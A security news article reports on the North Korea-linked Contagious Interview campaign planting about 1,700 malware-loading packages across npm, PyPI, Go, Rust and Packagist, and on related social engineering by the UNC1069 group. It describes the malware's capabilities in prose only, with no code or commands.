Hackers Spread 1,700 Malicious Packages Across npm, PyPI, Go, Rust

The North Korea-linked cyber campaign known as Contagious Interview has expanded its malicious activities by targeting various programming ecosystems, including Go, Rust, and PHP. According to a report by Socket security researcher Kirill Boychenko, the threat actors have developed packages that mimic legitimate developer tools but secretly function as malware loaders. This strategic move marks a significant extension of Contagious Interview’s operations into a coordinated cross-ecosystem supply chain attack. The identified malicious packages span several platforms, including npm, PyPI, Go, Rust, and Packagist. These packages are designed to download platform-specific second-stage payloads, which are malware with capabilities like infostealing and remote access trojans (RATs). The primary aim of these payloads is to collect sensitive data from web browsers, password managers, and cryptocurrency wallets, posing a significant threat to developers and their environments. One particularly concerning aspect of this campaign is the Windows version of the malware, delivered via the "license-utils-kit" package. This version includes a "full post-compromise implant" capable of executing shell commands, logging keystrokes, stealing browser data, and more. It can also deploy AnyDesk for remote access, create encrypted archives, and download additional modules, highlighting the depth of functionality embedded in the campaign. The malicious code within these packages is cleverly concealed, not activating during installation but rather embedded within functions that appear legitimate. For example, in the "logtrace" package, the harmful code is hidden within a method that aligns with the package's intended purpose, making it unlikely to arouse suspicion among developers. The expansion of Contagious Interview across multiple open-source ecosystems demonstrates the campaign's sophisticated and persistent nature. It is engineered to systematically infiltrate platforms as initial access points to breach developer environments, aiming for espionage and financial gain. Since January 2025, Socket has identified over 1,700 malicious packages linked to this activity, underscoring the scale of the threat. This campaign is part of a broader software supply chain compromise by North Korean hacking groups, including the poisoning of the popular Axios npm package. The attack has been linked to a financially motivated threat actor known as UNC1069, which overlaps with groups like BlueNoroff and Stardust Chollima. Security Alliance (SEAL) reported blocking numerous domains linked to UNC1069, which impersonated services like Microsoft Teams and Zoom to conduct social engineering attacks. UNC1069 employs long-term, low-pressure social engineering tactics across platforms like Telegram, LinkedIn, and Slack. They impersonate known contacts or credible brands to deliver fraudulent meeting links, leading to malware execution. These fake links initiate data theft and post-exploitation activities across various operating systems, with operators often leaving implants dormant to maximize the value extracted before detection. Microsoft has acknowledged the evolving tactics of these financially-driven North Korean threat actors. They continue to adapt their tools and infrastructure, using domains that mimic U.S.-based financial institutions and video conferencing applications for social engineering. Despite changes in tactics, the continuity in behavior and intent remains clear, posing ongoing challenges to cybersecurity efforts.